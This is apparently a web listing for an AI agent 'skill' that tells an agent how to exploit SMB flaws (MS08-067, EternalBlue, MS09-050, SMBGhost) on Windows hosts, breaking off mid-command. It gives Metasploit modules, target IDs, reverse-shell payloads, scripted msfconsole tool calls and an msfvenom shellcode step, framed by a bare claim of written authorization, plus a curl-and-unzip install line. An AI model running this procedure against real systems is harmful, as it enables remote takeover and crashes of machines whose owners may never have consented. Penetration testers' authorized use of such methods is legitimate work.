smb-exploitation
>
Install
mkdir -p .claude/skills/smb-exploitation && curl -L -o skill.zip "https://agentskills.codes/api/skills/download/16249" && unzip -o skill.zip -d .claude/skills/smb-exploitation && rm skill.zipInstalls to .claude/skills/smb-exploitation
Activation
This is the description your AI agent reads to decide when to run this skill — the better it matches your request, the more reliably it fires.
Exploit remote SMB vulnerabilities for unauthenticated code execution on Windows hosts.About this skill
SMB Remote Exploitation
You are helping a penetration tester exploit a confirmed SMB vulnerability for remote code execution. All testing is under explicit written authorization.
Engagement Logging
Check for ./engagement/ directory. If absent, proceed without logging.
When an engagement directory exists:
- Print
[smb-exploitation] Activated → <target>to the screen on activation. - Evidence → save significant output to
engagement/evidence/with descriptive filenames (e.g.,sqli-users-dump.txt,ssrf-aws-creds.json).
Scope Boundary
This skill covers SMB protocol exploitation — enumeration, authentication attacks, and share access. When you reach the boundary of this scope — whether through completing your methodology or discovering findings outside your domain — STOP.
Do not load or execute another skill. Do not continue past your scope boundary. Instead, return to the orchestrator with:
- What was found (vulns, credentials, access gained)
- Context to pass (injection point, target, working payloads, etc.)
The orchestrator decides what runs next. Your job is to execute this skill thoroughly and return clean findings.
Stay in methodology. Only use techniques documented in this skill. If you encounter a scenario not covered here, note it and return — do not improvise attacks, write custom exploit code, or apply techniques from other domains. The orchestrator will provide specific guidance or route to a different skill.
State Management
Call get_state_summary() from the state MCP server to read current
engagement state. Use it to:
- Skip re-testing targets, parameters, or vulns already confirmed
- Leverage existing credentials or access for this technique
- Understand what's been tried and failed (check Blocked section)
Your return summary must include:
- New targets/hosts discovered (with ports and services)
- New credentials or tokens found
- Access gained or changed (user, privilege level, method)
- Vulnerabilities confirmed (with status and severity)
- Pivot paths identified (what leads where)
- Blocked items (what failed and why, whether retryable)
Prerequisites
- SMB vulnerability confirmed via nmap
smb-vuln*scripts or equivalent - Target OS and architecture identified (critical for target selection)
- Network access to target port 445
- Metasploit Framework installed (
msfconsole) - Listener port available (default 4444, or specify alternative)
- Attack machine IP reachable from target (check with
ip addr show tun0for VPN, or appropriate interface)
Step 1: Assess
If not already provided by the orchestrator or conversation context, determine:
- Which vulnerability? Check engagement state or ask — MS08-067, MS17-010, MS09-050, or SMBGhost
- Target OS and architecture? Windows version, service pack, 32-bit vs 64-bit — critical for exploit target selection
- Attack machine IP? Run
ip -4 addr show tun0(or appropriate interface) to get the listener address
Vulnerability-to-OS Compatibility Matrix
| CVE | Vulnerability | Affected OS | Notes |
|---|---|---|---|
| CVE-2008-4250 | MS08-067 | XP SP0-SP3, Server 2003 SP0-SP2, Vista SP0-SP1, Server 2008 pre-SP2 | Most reliable on XP/2003 |
| CVE-2009-3103 | MS09-050 | Vista SP1-SP2, Server 2008 SP1-SP2 | SMBv2 negotiation bug |
| CVE-2017-0143 | MS17-010 (EternalBlue) | XP through Server 2016 (unpatched) | Unstable on XP/2003 32-bit |
| CVE-2020-0796 | SMBGhost | Windows 10 1903/1909, Server v1903/v1909 | SMBv3 compression |
Skip this step if the orchestrator already provided this information.
Step 2: Select Exploit and Target
MS08-067 (CVE-2008-4250)
Metasploit module: exploit/windows/smb/ms08_067_netapi
Preferred for Windows XP and Server 2003. More stable than EternalBlue on these older systems.
Target selection — critical for reliability:
| Target ID | OS |
|---|---|
| 0 | Automatic Targeting |
| 1 | Windows 2000 Universal |
| 2 | Windows XP SP0/SP1 Universal |
| 3 | Windows XP SP2 English (NX) |
| 4 | Windows XP SP3 English (NX) |
| 5 | Windows 2003 SP0 Universal |
| 6 | Windows XP SP2/SP3 English (AlwaysOn NX) |
| 7 | Windows 2003 SP1 English (NO NX) |
| 8 | Windows 2003 SP1 English (NX) |
| 9 | Windows 2003 SP2 English (NO NX) |
| 10 | Windows 2003 SP2 English (NX) |
Decision logic:
- If OS is "Windows XP" and SP2 or SP3: use target 6 (handles both, NX-aware)
- If OS is "Windows XP" and SP0/SP1: use target 2
- If OS is "Windows 2003" and SP1: use target 8 (NX) or target 7 (no NX)
- If OS is "Windows 2003" and SP2: use target 10 (NX) or target 9 (no NX)
- If OS is "Windows 2000": use target 1
- If unsure about NX: try NX-enabled target first — it works on both, the reverse doesn't
- If unsure about SP: use target 0 (automatic) — less reliable but attempts fingerprinting
- For non-English targets: use target 0 (automatic) and note that language-
specific targets exist in Metasploit (check
show targetsfor full list)
Payload selection:
- Default:
windows/shell_reverse_tcp— simple, reliable, no staging issues - Alternative:
windows/meterpreter/reverse_tcp— more features but staged payload can fail on slow/filtered links - If port 4444 is filtered: try 443 or 80 as LPORT
MS17-010 / EternalBlue (CVE-2017-0143)
Metasploit modules (choose based on target OS):
| Module | Best For | Notes |
|---|---|---|
exploit/windows/smb/ms17_010_eternalblue | Windows 7, Server 2008 R2, Server 2012, 10, Server 2016 (64-bit) | Primary module, most reliable on 64-bit |
exploit/windows/smb/ms17_010_psexec | Windows XP, Server 2003, Vista, 7, 2008 (32 and 64-bit) | Uses named pipes, more stable on 32-bit and older OS |
exploit/windows/smb/ms17_010_eternalblue_win8 | Windows 8, 8.1, Server 2012 | Specific Win8+ handling |
Decision logic:
- Windows 7 / Server 2008 R2 / Server 2012 / 10 / Server 2016 (64-bit):
use
ms17_010_eternalblue— primary module, highest success rate - Windows XP / Server 2003 (32-bit): use
ms17_010_psexec— the eternalblue module frequently BSODs 32-bit XP. psexec variant uses named pipes and is far more stable. Requires a valid named pipe — common defaults:samr,browser,lsarpc,netlogon,srvsvc - Windows Vista / Server 2008 (pre-R2): use
ms17_010_psexec - Windows 8 / 8.1 / Server 2012: try
ms17_010_eternalbluefirst, fall back toms17_010_eternalblue_win8
Named pipe selection for psexec variant:
set NAMEDPIPE samr
If samr fails, cycle through: browser, lsarpc, netlogon, srvsvc.
Null session access increases success — check engagement state for null auth status.
Payload selection:
- 64-bit targets:
windows/x64/shell_reverse_tcporwindows/x64/meterpreter/reverse_tcp - 32-bit targets:
windows/shell_reverse_tcporwindows/meterpreter/reverse_tcp
MS09-050 (CVE-2009-3103)
Metasploit module: exploit/windows/smb/ms09_050_smb2_negotiate_func_index
Narrow target range — only Vista SP1/SP2 and Server 2008 SP1/SP2.
Target selection:
| Target ID | OS |
|---|---|
| 0 | Windows Vista SP1/SP2 and Server 2008 SP1 (x86) |
Only 32-bit targets. If target is 64-bit, this exploit won't work — try MS17-010 instead.
SMBGhost (CVE-2020-0796)
Metasploit module: exploit/windows/smb/cve_2020_0796_smbghost
Very narrow target range — only Windows 10 v1903/v1909 and Server v1903/v1909 with SMBv3.1.1 compression enabled.
Confirmation (before attempting):
# Check for SMBv3.1.1 compression support
nmap -p445 --script smb2-capabilities TARGET_IP
Stability warning: This exploit targets kernel memory and has a moderate BSOD risk. Always warn before launching.
Step 3: Generate and Execute
Interactive Metasploit via start_process (Preferred)
Spawn msfconsole in a persistent PTY via the shell-server MCP. This lets the
agent drive Metasploit interactively — configure the exploit, run it, and
interact with the resulting session through send_command calls.
# 1. Spawn msfconsole
start_process(command="msfconsole -q", label="msfconsole-eternalblue")
# 2. Configure and run (via send_command with expect patterns)
send_command(session_id=..., command="use <MODULE>", expect="msf6 exploit")
send_command(session_id=..., command="set RHOSTS <TARGET_IP>")
send_command(session_id=..., command="set LHOST <ATTACK_IP>")
send_command(session_id=..., command="set LPORT <PORT>")
send_command(session_id=..., command="set TARGET <TARGET_ID>")
send_command(session_id=..., command="set PAYLOAD <PAYLOAD>")
send_command(session_id=..., command="run", timeout=60, expect="session \\d+ opened")
For MS17-010 psexec variant, also set: set NAMEDPIPE samr
For SMBGhost, also set: set PROCESSOR_ARCHITECTURE x64
When Metasploit catches the shell, it lives inside the same PTY session. The
agent interacts with the Meterpreter/cmd session through the same
send_command calls — no port conflict, no DisablePayloadHandler needed.
Resource File Approach (Fallback)
If start_process is unavailable or msfconsole needs to be run outside the
MCP, generate a resource file:
Template (adapt per exploit selection from Step 2):
cat > temp_smb-exploit.rc << 'RCEOF'
use <MODULE>
set RHOSTS <TARGET_IP>
set LHOST <ATTACK_IP>
set LPORT <PORT>
set TARGET <TARGET_ID>
set PAYLOAD <PAYLOAD>
run
RCEOF
For MS17-010 psexec variant, add:
set NAMEDPIPE samr
For SMBGhost, add:
set PROCESSOR_ARCHITECTURE x64
Execution: Present the resource file contents to the user and instruct:
msfconsole -q -r temp_smb-exploit.rc
Standalone Exploits (When Metasploit Is Unavailable)
If Metasploit is not available, standalone Python exploits exist:
MS17-010 (AutoBlue):
# Generate shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACK_IP> LPORT=
---
*Content truncated.*